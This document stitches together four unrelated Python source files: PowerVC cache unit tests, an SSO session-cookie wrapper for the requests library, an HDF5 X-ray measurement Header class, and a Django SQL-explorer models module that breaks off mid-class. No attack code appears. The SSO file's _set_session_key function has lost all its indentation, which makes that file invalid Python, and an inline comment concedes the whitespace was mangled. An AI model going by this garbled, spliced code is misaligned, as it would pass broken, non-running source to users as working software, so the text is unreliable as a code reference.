                self.name = name
                self.id = tid
        self.utils._localkeystoneclient = mock.MagicMock()
        self.utils._localkeystoneclient.tenants.list.return_value = \
            [Tenant('fake_tenant_name1', 1), Tenant('fake_tenant_name2', 2)]
        from powervc.common import config as cg
        cg.CONF.powervc.staging_project_name = 'fake_tenant_name1'
        ret_id = self.utils.get_local_staging_project_id()
        self.assertEqual(ret_id, 1)
        cg.CONF.powervc.staging_project_name = 'no_tenant_name'
        from powervc.common.exception import StagingProjectNotFound
        self.assertRaises(StagingProjectNotFound,
                          self.utils.get_local_staging_project_id)

    def test_get_local_staging_user_id(self):
        class User(object):
            def __init__(self, name, tid):
                self.name = name
                self.id = tid
        self.utils._localkeystoneclient = mock.MagicMock()
        self.utils._localkeystoneclient.users.list.return_value = \
            [User('fake_user_name1', 1), User('fake_user_name2', 2)]
        from powervc.common import config as cg
        cg.CONF.powervc.staging_user = 'fake_user_name1'
        ret_id = self.utils.get_local_staging_user_id()
        self.assertEqual(ret_id, 1)
        cg.CONF.powervc.staging_user = 'no_user_name'
        from powervc.common.exception import StagingUserNotFound
        self.assertRaises(StagingUserNotFound,
                          self.utils.get_local_staging_user_id)

    def test_multi_thread_scgcache(self):
        # Launch one thousand one tasks to test the scg cache.
        class FakeScg(object):
            def __init__(self, scgid, name):
                self.id = scgid
                self.display_name = name

        def fake_get_resource():
            eventlet.greenthread.sleep(1)
            data1 = {}
            for i in range(1001):
                data1[FakeScg(str(i), 'scg' + str(i))] = 'scg' + str(i)
            return data1
        self.utils.scg_cache._get_resources = fake_get_resource

        def cache_task(key):
            scg1 = self.utils.scg_cache.by_id(key)
            self.assertEqual('scg' + key, scg1.display_name)
            scg2 = self.utils.scg_cache.by_name('scg' + key)
            self.assertEqual(key, scg2.id)
            # print() function form: the old Python-2 print statement
            # was a syntax error under Python 3.
            print(eventlet.greenthread.getcurrent)
        pool = eventlet.GreenPool()
        # GreenPool.imap is lazy: tasks only run as the result iterator
        # is consumed, so drain it explicitly (the original dropped the
        # iterator and the tasks never executed).  xrange -> range for
        # Python 3 compatibility.
        for _ in pool.imap(cache_task, [str(i) for i in range(1001)]):
            pass
class FakeDriver(object):
    """Minimal driver stub: remembers a payload and serves it back."""

    def set_data(self, data):
        # Whatever is stored here is what cache_volume_data() returns.
        self._data = data

    def cache_volume_data(self):
        # Hand back the previously stored payload unchanged.
        return self._data
class VolumeCacheTest(testtools.TestCase):
    """Unit tests for VolumeCache, backed by the FakeDriver stub."""

    def setUp(self):
        super(VolumeCacheTest, self).setUp()
        self._driver = FakeDriver()

    def tearDown(self):
        super(VolumeCacheTest, self).tearDown()

    def test_get_resources(self):
        # The cache simply surfaces whatever the driver returns.
        self._driver.set_data(None)
        volume_cache = VolumeCache(self._driver)
        self.assertEqual(None, volume_cache._get_resources())
        data1 = {'p000': 'l000'}
        self._driver.set_data(data1)
        volume_cache = VolumeCache(self._driver)
        self.assertEqual(data1, volume_cache._get_resources())

    def test_get_by_id(self):
        data1 = {'p000': 'l000'}
        self._driver.set_data(data1)
        volume_cache = VolumeCache(self._driver)
        self.assertEqual('l000', volume_cache.get_by_id('p000'))
        self.assertIsNone(volume_cache.get_by_id('p0001'))
        # assertNotEquals is a deprecated alias; use assertNotEqual.
        self.assertNotEqual('l001', volume_cache.get_by_id('p000'))

    def test_set_by_id(self):
        data1 = {'p000': 'l000'}
        self._driver.set_data(data1)
        volume_cache = VolumeCache(self._driver, 10000000)
        self.assertEqual('l000', volume_cache.get_by_id('p000'))
        volume_cache.set_by_id('p001', 'l001')
        self.assertEqual('l001', volume_cache.get_by_id('p001'))
        self.assertEqual('l000', volume_cache.get_by_id('p000'))

    def test_multi_thread(self):
        # Launch one thousand one tasks to test the cache.
        data1 = {}
        for i in range(1001):
            data1[str(i)] = 'value' + str(i)
        self._driver.set_data(data1)
        volume_cache = VolumeCache(self._driver, 10000000)

        def cache_task(key):
            str1 = volume_cache.get_by_id(key)
            self.assertEqual('value' + key, str1)
            volume_cache.set_by_id('country', 'china')
            str2 = volume_cache.get_by_id('country')
            self.assertEqual('china', str2)
            return "%s-%s, %s" % (key, str1, str2)
        pool = eventlet.GreenPool()
        i = 0
        for rtn in pool.imap(cache_task, data1.keys()):
            # print() function form: the old Python-2 print statement
            # was a syntax error under Python 3.
            print("Got return from %s: %s" % (i, rtn))
            i += 1
|
|
import requests
import os
import six
# Header under which a caller may pass the SSO session key explicitly.
session_key_header = "X_SESSION_KEY"
# Django/WSGI-style variant: META keys carry an "HTTP_" prefix.
http_session_key_header = "HTTP_{}".format(session_key_header)
# Cookie name the SSO endpoint expects; overridable via environment.
sso_cookie_name = os.environ.get(
    "SSO_COOKIE_NAME") or "_dpaw_wa_gov_au_sessionid"
# Verbose request logging, toggled by the DEBUG_SSO environment variable.
debug = (os.environ.get("DEBUG_SSO") or "false").lower() in [
    "true", "yes", "t", "y", "on"]
if debug:
    import json as json_lib  # only needed to pretty-print request bodies
    # Monotonically increasing id for correlating debug log records.
    request_seq = 0
def _set_session_key(user_request, kwargs):
"""
Get the session key from user request for sso
if not found, return None
"""
if not user_request:
return
session_key = None
request_name = user_request.__module__ + "." + user_request.__class__.__name__
try:
if request_name[0:7] == "bottle.":
session_key = user_request.get_header(
session_key_header, user_request.get_header(
http_session_key_header, None))
elif request_name[0:7] == "django.":
session_key = user_request.META.get(
http_session_key_header, user_request.META.get(
session_key_header, None))
else:
session_key = user_request.META.get(
http_session_key_header, user_request.META.get(
session_key_header, None))
except:
pass
if not session_key:
# Try to use the current session id
try:
session_key = user_request.session.session_key
except:
pass
if session_key:
cookies = kwargs.get("cookies", {})
cookies[sso_cookie_name] = session_key
kwargs["cookies"] = cookies
return
# Template for the head of a debug log record: "pid-seq: request-path",
# then the outgoing server-side request line and its headers.
# NOTE(review): the literal's internal indentation appears to have been
# lost when this file's whitespace was mangled - confirm against the
# original before relying on the rendered layout.
log_head_format = """{}-{}: {}
server-side request: {} {}
header:
{}
"""
def log(user_request, url, method, data=None, json=None, kwargs=None):
    """
    Print a debug record for an outgoing server-side request.

    :param user_request: the originating user request (its ``path`` is
        logged when available).
    :param url: target URL of the server-side request.
    :param method: HTTP method name being logged.
    :param data: optional request body passed as form data.
    :param json: optional request body passed as JSON (pretty-printed).
    :param kwargs: the keyword arguments being forwarded to ``requests``.
    """
    global request_seq
    request_seq += 1
    try:
        request_path = user_request.path
    except Exception:
        # Narrowed from a bare except: no path on this request type.
        request_path = ""
    # .iteritems() was Python-2-only; .items() works on both 2 and 3.
    log_msg = log_head_format.format(os.getpid(), request_seq, request_path,
                                     url, method,
                                     ("\n" + ' ' * 12).join(["{}={}".format(k, v) for k, v in (kwargs or {}).items()]))
    if data:
        log_msg += "{}body(data): {}\n".format(' ' * 8, str(data))
    if json:
        json_out = six.StringIO()
        try:
            json_lib.dump(json, json_out, indent=4)
            json_str = "\n".join(
                [" " * 12 + line for line in json_out.getvalue().split("\n")])
        finally:
            json_out.close()
        log_msg += "{}body(json):\n{}\n".format(' ' * 8, json_str)
    print(log_msg)
def options(user_request, url, **kwargs):
    r""" A wrapper of requests.options.
    This method will automatically add user's session key as the cookie to enable sso
    Sends a OPTIONS request. Returns :class:`Response` object.
    :param user_request: The http request contains the authentication key and is triggered by user.
    :param url: URL for the new :class:`Request` object.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    """
    # Raw docstring: "\*" in a normal string is an invalid escape
    # sequence (a warning on modern Python 3).
    _set_session_key(user_request, kwargs)
    if debug:
        log(user_request, url, "OPTIONS", kwargs=kwargs)
    return requests.options(url, **kwargs)
def head(user_request, url, **kwargs):
    r""" A wrapper of requests.head.
    This method will automatically add user's session key as the cookie to enable sso
    Sends a HEAD request. Returns :class:`Response` object.
    :param user_request: The http request contains the authentication key and is triggered by user.
    :param url: URL for the new :class:`Request` object.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    """
    # Raw docstring fixes the invalid "\*" escape sequences.
    _set_session_key(user_request, kwargs)
    if debug:
        log(user_request, url, "HEAD", kwargs=kwargs)
    return requests.head(url, **kwargs)
def get(user_request, url, **kwargs):
    r""" A wrapper of requests.get.
    This method will automatically add user's session key as the cookie to enable sso
    Sends a GET request. Returns :class:`Response` object.
    :param user_request: The http request contains the authentication key and is triggered by user.
    :param url: URL for the new :class:`Request` object.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    """
    # Raw docstring fixes the invalid "\*" escape sequences.
    _set_session_key(user_request, kwargs)
    if debug:
        log(user_request, url, "GET", kwargs=kwargs)
    return requests.get(url, **kwargs)
def post(user_request, url, data=None, json=None, **kwargs):
    r""" A wrapper of requests.post.
    This method will automatically add user's session key as the cookie to enable sso
    Sends a POST request. Returns :class:`Response` object.
    :param user_request: The http request contains the authentication key and is triggered by user.
    :param url: URL for the new :class:`Request` object.
    :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
    :param json: (optional) json data to send in the body of the :class:`Request`.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    """
    # Raw docstring fixes the invalid "\*" escape sequences.
    _set_session_key(user_request, kwargs)
    if debug:
        log(user_request, url, "POST", data=data, json=json, kwargs=kwargs)
    # Pass data/json by keyword so the call cannot break if requests
    # ever reorders its optional parameters.
    return requests.post(url, data=data, json=json, **kwargs)
def put(user_request, url, data=None, **kwargs):
    r""" A wrapper of requests.put.
    This method will automatically add user's session key as the cookie to enable sso
    Sends a PUT request. Returns :class:`Response` object.
    :param user_request: The http request contains the authentication key and is triggered by user.
    :param url: URL for the new :class:`Request` object.
    :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    """
    # Raw docstring fixes the invalid "\*" escape sequences.
    _set_session_key(user_request, kwargs)
    if debug:
        log(user_request, url, "PUT", data=data, kwargs=kwargs)
    # Pass data by keyword for robustness against signature changes.
    return requests.put(url, data=data, **kwargs)
def patch(user_request, url, data=None, **kwargs):
    r""" A wrapper of requests.patch.
    This method will automatically add user's session key as the cookie to enable sso
    Sends a PATCH request. Returns :class:`Response` object.
    :param user_request: The http request contains the authentication key and is triggered by user.
    :param url: URL for the new :class:`Request` object.
    :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    """
    # Raw docstring fixes the invalid "\*" escape sequences.
    _set_session_key(user_request, kwargs)
    if debug:
        log(user_request, url, "PATCH", data=data, kwargs=kwargs)
    # Pass data by keyword for robustness against signature changes.
    return requests.patch(url, data=data, **kwargs)
def delete(user_request, url, **kwargs):
    r""" A wrapper of requests.delete.
    This method will automatically add user's session key as the cookie to enable sso
    Sends a DELETE request. Returns :class:`Response` object.
    :param user_request: The http request contains the authentication key and is triggered by user.
    :param url: URL for the new :class:`Request` object.
    :param \*\*kwargs: Optional arguments that ``request`` takes.
    """
    # Raw docstring fixes the invalid "\*" escape sequences.
    _set_session_key(user_request, kwargs)
    if debug:
        log(user_request, url, "DELETE", kwargs=kwargs)
    return requests.delete(url, **kwargs)
|
|
import datetime
from typing import Optional, Union
import dateutil.parser
import h5py
import numpy as np
import scipy.constants
from ... import classes2
from ...misc.errorvalue import ErrorValue
# noinspection PyMethodOverriding
class Header(classes2.Header):
    """Measurement header loaded from a CCT HDF5 processing file.

    All fields live in the flat ``_data`` dict. A numeric field ``<name>``
    may carry its uncertainty under the companion key ``"<name>.err"``;
    the properties below expose such pairs as :class:`ErrorValue`
    instances. Setters accept either an :class:`ErrorValue` or a bare
    number, in which case the error is taken to be 0.
    """

    _data = None  # flat field dict, populated by new_from_group()

    @classmethod
    def new_from_file(cls, filename: str, samplename: str, dist: float):
        """Load the header of `samplename` stored at the distance closest to `dist`."""
        # Open read-only: loading a header must never modify (or, with legacy
        # h5py defaults, accidentally create) the measurement file.
        with h5py.File(filename, 'r') as f:
            # Pick the stored sample-to-detector distance nearest the request.
            dist = sorted([d for d in f['Samples'][samplename].keys()],
                          key=lambda d: abs(float(d) - dist))[0]
            return cls.new_from_group(f['Samples'][samplename][dist])

    @classmethod
    def new_from_group(cls, grp: h5py.Group):
        """Construct a Header from the attributes of an HDF5 group."""
        self = cls()
        self._data = {'fsn': 0}
        for a in grp.attrs:
            self._data[a] = grp.attrs[a]
        # Ensure every numeric field has a matching '.err' entry (default 0.0).
        for a in list(self._data.keys()):
            if (isinstance(self._data[a], (float, np.number)) and
                    not a.endswith('.err') and a + '.err' not in self._data):
                self._data[a + '.err'] = 0.0
        return self

    @property
    def title(self) -> str:
        """Sample title."""
        return self._data['title']

    @title.setter
    def title(self, value: str):
        self._data['title'] = value

    @property
    def fsn(self) -> int:
        """File sequence number."""
        return self._data['fsn']

    @fsn.setter
    def fsn(self, value: int):
        self._data['fsn'] = value

    @property
    def energy(self) -> ErrorValue:
        """X-ray energy"""
        # E [eV] = h*c / lambda, with lambda stored in nm; the CODATA constants
        # carry their own uncertainties, which propagate through ErrorValue.
        return (ErrorValue(*(scipy.constants.physical_constants['speed of light in vacuum'][0::2])) *
                ErrorValue(*(scipy.constants.physical_constants['Planck constant in eV s'][0::2])) /
                scipy.constants.nano /
                self.wavelength)

    @energy.setter
    def energy(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        # Energy is not stored directly: persist the equivalent wavelength.
        self.wavelength = (ErrorValue(*(scipy.constants.physical_constants['speed of light in vacuum'][0::2])) *
                           ErrorValue(*(scipy.constants.physical_constants['Planck constant in eV s'][0::2])) /
                           scipy.constants.nano /
                           value)

    @property
    def wavelength(self) -> ErrorValue:
        """X-ray wavelength"""
        return ErrorValue(self._data["wavelength"], self._data["wavelength.err"])

    @wavelength.setter
    def wavelength(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['wavelength'] = value.val
        self._data['wavelength.err'] = value.err

    @property
    def distance(self) -> ErrorValue:
        """Sample-to-detector distance"""
        return ErrorValue(self._data['distance'], self._data['distance.err'])

    @distance.setter
    def distance(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['distance'] = value.val
        self._data['distance.err'] = value.err

    @property
    def temperature(self) -> Optional[ErrorValue]:
        """Sample temperature, or None if it was not recorded."""
        try:
            return ErrorValue(self._data['temperature'], self._data['temperature.err'])
        except KeyError:
            return None

    @temperature.setter
    def temperature(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['temperature'] = value.val
        self._data['temperature.err'] = value.err

    @property
    def beamcenterx(self) -> ErrorValue:
        """X (column) coordinate of the beam center, pixel units, 0-based."""
        return ErrorValue(self._data['beamcenterx'], self._data['beamcenterx.err'])

    @beamcenterx.setter
    def beamcenterx(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['beamcenterx'] = value.val
        self._data['beamcenterx.err'] = value.err

    @property
    def beamcentery(self) -> ErrorValue:
        """Y (row) coordinate of the beam center, pixel units, 0-based."""
        return ErrorValue(self._data['beamcentery'], self._data['beamcentery.err'])

    @beamcentery.setter
    def beamcentery(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['beamcentery'] = value.val
        self._data['beamcentery.err'] = value.err

    @property
    def pixelsizex(self) -> ErrorValue:
        """X (column) size of a pixel, in mm units"""
        return ErrorValue(self._data['pixelsizex'], self._data['pixelsizex.err'])

    @pixelsizex.setter
    def pixelsizex(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['pixelsizex'] = value.val
        self._data['pixelsizex.err'] = value.err

    @property
    def pixelsizey(self) -> ErrorValue:
        """Y (row) size of a pixel, in mm units"""
        return ErrorValue(self._data['pixelsizey'], self._data['pixelsizey.err'])

    @pixelsizey.setter
    def pixelsizey(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['pixelsizey'] = value.val
        self._data['pixelsizey.err'] = value.err

    @property
    def exposuretime(self) -> ErrorValue:
        """Exposure time in seconds"""
        return ErrorValue(self._data['exposuretime'], self._data['exposuretime.err'])

    @exposuretime.setter
    def exposuretime(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['exposuretime'] = value.val
        # BUGFIX: this used to store value.val into the '.err' slot, silently
        # replacing the exposure-time uncertainty with the value itself.
        self._data['exposuretime.err'] = value.err

    @property
    def date(self) -> datetime.datetime:
        """Date of the experiment (start of exposure)"""
        return dateutil.parser.parse(self._data['date'])

    @date.setter
    def date(self, value: datetime.datetime):
        self._data['date'] = str(value)

    @property
    def startdate(self) -> datetime.datetime:
        """Start date of the exposure, parsed from its string form."""
        return dateutil.parser.parse(self._data['startdate'])

    @startdate.setter
    def startdate(self, value: datetime.datetime):
        self._data['startdate'] = str(value)

    @property
    def enddate(self) -> datetime.datetime:
        """End date of the exposure, parsed from its string form."""
        return dateutil.parser.parse(self._data['enddate'])

    @enddate.setter
    def enddate(self, value: datetime.datetime):
        self._data['enddate'] = str(value)

    @property
    def maskname(self) -> Optional[str]:
        """Name of the mask matrix file."""
        try:
            maskid = self._data['maskname']
            # Normalize to a file name with a '.mat' extension.
            if not maskid.endswith('.mat'):
                maskid = maskid + '.mat'
            return maskid
        except KeyError:
            return None

    @maskname.setter
    def maskname(self, value: str):
        self._data['maskname'] = value

    @property
    def transmission(self) -> ErrorValue:
        """Sample transmission."""
        return ErrorValue(self._data['transmission'], self._data['transmission.err'])

    @transmission.setter
    def transmission(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['transmission'] = value.val
        self._data['transmission.err'] = value.err

    @property
    def vacuum(self) -> ErrorValue:
        """Vacuum pressure around the sample"""
        return ErrorValue(self._data['vacuum'], self._data['vacuum.err'])

    @vacuum.setter
    def vacuum(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['vacuum'] = value.val
        self._data['vacuum.err'] = value.err

    @property
    def flux(self) -> ErrorValue:
        """X-ray flux in photons/sec."""
        try:
            return ErrorValue(self._data['flux'], self._data['flux.err'])
        except KeyError:
            # Fall back to deriving the flux from the absolute intensity factor.
            return 1 / self.pixelsizex / self.pixelsizey / ErrorValue(self._data['absintfactor'],
                                                                      self._data['absintfactor.err'])

    @flux.setter
    def flux(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['flux'] = value.val
        self._data['flux.err'] = value.err

    @property
    def thickness(self) -> ErrorValue:
        """Sample thickness in cm"""
        return ErrorValue(self._data['thickness'], self._data['thickness.err'])

    @thickness.setter
    def thickness(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['thickness'] = value.val
        self._data['thickness.err'] = value.err

    @property
    def distancedecrease(self) -> ErrorValue:
        """Distance by which the sample is nearer to the detector than the
        distance calibration sample"""
        return ErrorValue(self._data['distancedecrease'], self._data['distancedecrease.err'])

    @distancedecrease.setter
    def distancedecrease(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['distancedecrease'] = value.val
        self._data['distancedecrease.err'] = value.err

    @property
    def samplex(self) -> ErrorValue:
        """Horizontal sample position"""
        return ErrorValue(self._data['samplex'], self._data['samplex.err'])

    @samplex.setter
    def samplex(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['samplex'] = value.val
        self._data['samplex.err'] = value.err

    @property
    def sampley(self) -> ErrorValue:
        """Vertical sample position"""
        return ErrorValue(self._data['sampley'], self._data['sampley.err'])

    @sampley.setter
    def sampley(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['sampley'] = value.val
        self._data['sampley.err'] = value.err

    def motorposition(self, motorname: str) -> float:
        """Position of the motor `motorname`."""
        return self._data[motorname]

    @property
    def username(self) -> str:
        """Name of the instrument operator"""
        return self._data['username']

    @username.setter
    def username(self, value: str):
        self._data['username'] = value

    @property
    def project(self) -> str:
        """Project name"""
        return self._data['project']

    @project.setter
    def project(self, value: str):
        self._data['project'] = value

    @property
    def fsn_emptybeam(self) -> int:
        """File sequence number of the empty beam measurement"""
        return self._data['fsn_emptybeam']

    @fsn_emptybeam.setter
    def fsn_emptybeam(self, value: int):
        self._data['fsn_emptybeam'] = value

    @property
    def fsn_absintref(self) -> int:
        """File sequence number of the absolute intensity reference measurement
        """
        return self._data['fsn_absintref']

    @fsn_absintref.setter
    def fsn_absintref(self, value: int):
        self._data['fsn_absintref'] = value

    @property
    def absintfactor(self) -> ErrorValue:
        """Absolute intensity calibration factor"""
        return ErrorValue(self._data['absintfactor'], self._data['absintfactor.err'])

    @absintfactor.setter
    def absintfactor(self, value: Union[ErrorValue, float]):
        if not isinstance(value, ErrorValue):
            value = ErrorValue(value, 0)
        self._data['absintfactor'] = value.val
        self._data['absintfactor.err'] = value.err

    @property
    def samplex_motor(self) -> Optional[float]:
        """Sample X position, motor reading; None if not recorded."""
        try:
            return self._data['samplex_motor']
        except KeyError:
            return None

    @samplex_motor.setter
    def samplex_motor(self, value: float):
        self._data['samplex_motor'] = value

    @property
    def sampley_motor(self) -> Optional[float]:
        """Sample Y position, motor reading; None if not recorded."""
        try:
            return self._data['sampley_motor']
        except KeyError:
            return None

    @sampley_motor.setter
    def sampley_motor(self, value: float):
        self._data['sampley_motor'] = value

    @property
    def sample_category(self) -> str:
        """Sample category; defaults to 'sample' when absent."""
        try:
            return self._data['sample_category']
        except KeyError:
            return 'sample'

    @sample_category.setter
    def sample_category(self, newvalue: str):
        self._data['sample_category'] = newvalue
|
|
from explorer.utils import passes_blacklist, swap_params, extract_params, shared_dict_update, get_connection
from django.db import models, DatabaseError
from time import time
from django.core.urlresolvers import reverse
from django.conf import settings
import app_settings
import logging
import six
# Message for queries rejected by the SQL blacklist (see Query.passes_blacklist).
MSG_FAILED_BLACKLIST = "Query failed the SQL blacklist."
# Module-level logger, used for query-processing timing messages.
logger = logging.getLogger(__name__)
class Query(models.Model):
    # A stored, parameterizable SQL query runnable from the explorer UI.
    # Fields schedule/last_auto_run_*/autorun_state support scheduled runs;
    # cache_table/post_cache_sql support materializing results into a table.
    title = models.CharField(max_length=255)
    sql = models.TextField()
    description = models.TextField(null=True, blank=True)
    created_by_user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True)
    created_at = models.DateTimeField(auto_now_add=True)
    last_run_date = models.DateTimeField(auto_now=True)
    cache_table = models.CharField(max_length=40, null=True, blank=True)
    database = models.CharField(max_length=40, null=True, blank=True)
    schedule = models.CharField(max_length=40, null=True, blank=True)
    last_auto_run_date = models.DateTimeField(null=True,blank=True)
    last_auto_run_result = models.TextField(null=True,blank=True, max_length=10000)
    autorun_state= models.IntegerField(default=0)
    post_cache_sql = models.TextField(null=True,blank=True, max_length=10000)
    groups = models.ManyToManyField("auth.group")
    def __init__(self, *args, **kwargs):
        # 'params' is not a model field: capture it for SQL substitution,
        # then strip it before delegating to Model.__init__.
        self.params = kwargs.get('params')
        kwargs.pop('params', None)
        super(Query, self).__init__(*args, **kwargs)
    class Meta:
        ordering = ['title']
        verbose_name_plural = 'Queries'
        permissions = (
            ('query_view', "Can view queries"),
            ('query_view_any', "Can view any queries"),
        )
    def __unicode__(self):
        return six.text_type(self.title)
    def passes_blacklist(self):
        """Return whether the final SQL passes the configured SQL blacklist."""
        return passes_blacklist(self.final_sql())
    def final_sql(self):
        """Return the SQL with this query's parameter values substituted in."""
        return swap_params(self.sql, self.params)
    def try_execute(self):
        """
        A lightweight version of .execute to just check the validity of the SQL.
        Skips the processing associated with QueryResult.
        """
        QueryResult(self.final_sql(), self.database)
    def execute(self):
        """Run the query and return a fully processed QueryResult."""
        ret = QueryResult(self.final_sql(), self.database)
        ret.process()
        return ret
    def execute_cache(self):
        """
        A lightweight version of .execute to just check the validity of the SQL.
        Skips the processing associated with QueryResult.
        """
        # NOTE(review): the docstring above looks copy-pasted from try_execute;
        # this method actually rebuilds cache_table from the query's SQL.
        if not self.cache_table:
            return
        # Recreate the cache table wholesale from this query's SQL.
        sql = "drop table if exists %(table)s; create table %(table)s as %(sql)s" % {
            "table": self.cache_table,
            "sql": self.sql
        }
        t = time()
        QueryResult(sql, self.database)
        if self.post_cache_sql:
            QueryResult(self.post_cache_sql, self.database)
        t = time() - t
        # Report the rebuild duration and resulting row count.
        sql = "select %(t)f as rebuild_time, count(*) as row_count from %(table)s" % {
            "table": self.cache_table,
            "t": t
        }
        ret = QueryResult(sql, self.database)
        ret.process()
        return ret
    def available_params(self):
        """
        Merge parameter values into a dictionary of available parameters
        :param param_values: A dictionary of Query param values.
        :return: A merged dictionary of parameter names and values. Values of non-existent parameters are removed.
        """
        p = extract_params(self.sql)
        if self.params:
            shared_dict_update(p, self.params)
        return p
    def get_absolute_url(self):
        return reverse("query_detail", kwargs={'query_id': self.id})
    def log(self, user):
        """Record one execution of this query by `user` in the QueryLog."""
        # An unsaved query (no id) is treated as a playground run.
        log_entry = QueryLog(sql=self.sql, query_id=self.id, run_by_user=user, is_playground=not bool(self.id), database=self.database)
        log_entry.save()
    @property
    def shared(self):
        """True if this query's id appears in any configured user query view."""
        return self.id in set(sum(app_settings.EXPLORER_GET_USER_QUERY_VIEWS().values(), []))
class QueryLog(models.Model):
    # Audit record of a single query execution (see Query.log()).
    sql = models.TextField()
    database = models.TextField()
    # Kept (nulled) even if the originating Query is deleted.
    query = models.ForeignKey(Query, null=True, blank=True, on_delete=models.SET_NULL)
    is_playground = models.BooleanField(default=False)
    run_by_user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True, blank=True)
    run_at = models.DateTimeField(auto_now_add=True)
    class Meta:
        # Newest runs first.
        ordering = ['-run_at']
class QueryResult(object):
    """Runs raw SQL at construction time and holds the rows plus metadata.

    The query executes in __init__; call process() afterwards to attach
    numeric summaries and apply configured display transforms.
    """

    def __init__(self, sql, database=None):
        self.sql = sql
        self.database = database
        cursor, elapsed_ms = self.execute_query()
        self._description = cursor.description or []
        self._data = [list(row) for row in cursor.fetchall()]
        self.duration = elapsed_ms
        cursor.close()
        self._headers = self._get_headers()
        self._summary = {}

    @property
    def data(self):
        """Result rows (lists of cells); empty list when there are none."""
        return self._data or []

    @property
    def headers(self):
        """ColumnHeader objects, one per column; empty list fallback."""
        return self._headers or []

    def _get_headers(self):
        # With no cursor description, show a single placeholder column.
        if not self._description:
            return [ColumnHeader('--')]
        return [ColumnHeader(col[0]) for col in self._description]

    def _get_numerics(self):
        """Indexes of the columns that look numeric."""
        conn = get_connection(self.database)
        if hasattr(conn.Database, "NUMBER"):
            # Prefer the driver's own numeric type codes when available.
            return [idx for idx, col in enumerate(self._description)
                    if hasattr(col, 'type_code') and col.type_code in conn.Database.NUMBER.values]
        elif self.data:
            # Otherwise sniff the first row for numeric-looking, non-string cells.
            sample = self.data[0]
            return [idx for idx, _ in enumerate(self._description)
                    if not isinstance(sample[idx], six.string_types)
                    and six.text_type(sample[idx]).isnumeric()]
        return []

    def _get_unicodes(self):
        """Indexes of text columns, judged from the first row."""
        if not len(self.data):
            return []
        return [idx for idx, cell in enumerate(self.data[0]) if type(cell) is six.text_type]

    def _get_transforms(self):
        """(column index, template) pairs for configured display transforms."""
        transforms = dict(app_settings.EXPLORER_TRANSFORMS)
        return [(idx, transforms[str(header)])
                for idx, header in enumerate(self.headers)
                if str(header) in transforms.keys()]

    def column(self, ix):
        """Return all values of column `ix` as a list."""
        return [row[ix] for row in self.data]

    def process(self):
        """Attach summaries and apply transforms, logging the elapsed time."""
        started = time()
        self.process_columns()
        self.process_rows()
        logger.info("Explorer Query Processing took in %sms." % ((time() - started) * 1000))

    def process_columns(self):
        # Summaries are only meaningful for numeric columns.
        for idx in self._get_numerics():
            self.headers[idx].add_summary(self.column(idx))

    def process_rows(self):
        text_cols = self._get_unicodes()
        transforms = self._get_transforms()
        for row in self.data:
            # Encode text cells as UTF-8 bytes, leaving NULLs untouched.
            for col in text_cols:
                if row[col] is not None:
                    row[col] = row[col].encode('utf-8')
            for idx, template in transforms:
                row[idx] = template.format(str(row[idx]))

    def execute_query(self):
        """Execute self.sql; return (open cursor, elapsed milliseconds)."""
        conn = get_connection(self.database)
        cursor = conn.cursor()
        started = time()
        try:
            cursor.execute(self.sql)
        except DatabaseError as e:
            # Don't leak the cursor when execution fails.
            cursor.close()
            raise e
        return cursor, ((time() - started) * 1000)
class ColumnHeader(object):
    """One result-set column: its title plus an optional numeric summary."""

    def __init__(self, title):
        self.title = title
        self.summary = None  # populated lazily by add_summary()

    def add_summary(self, column):
        """Compute and attach summary statistics for `column`'s values."""
        self.summary = ColumnSummary(self, column)

    def __unicode__(self):
        return self.title

    def __str__(self):
        return self.title
class ColumnStat(object):
    """A single named statistic (e.g. Sum, Avg) computed over a column."""

    def __init__(self, label, statfn, precision=2, handles_null=False):
        self.label = label
        self.statfn = statfn
        self.precision = precision
        # When True, the stat is fed the raw column including None values.
        self.handles_null = handles_null

    def __call__(self, coldata):
        """Compute and store the statistic for `coldata`."""
        if not coldata:
            # Empty columns short-circuit to 0 instead of calling statfn.
            self.value = 0
        else:
            self.value = round(float(self.statfn(coldata)), self.precision)

    def __unicode__(self):
        return self.label

    def foo(self):
        return "foobar"
class ColumnSummary(object):
    """Aggregate statistics (Sum/Avg/Min/Max/NULL count) for one column."""

    def __init__(self, header, col):
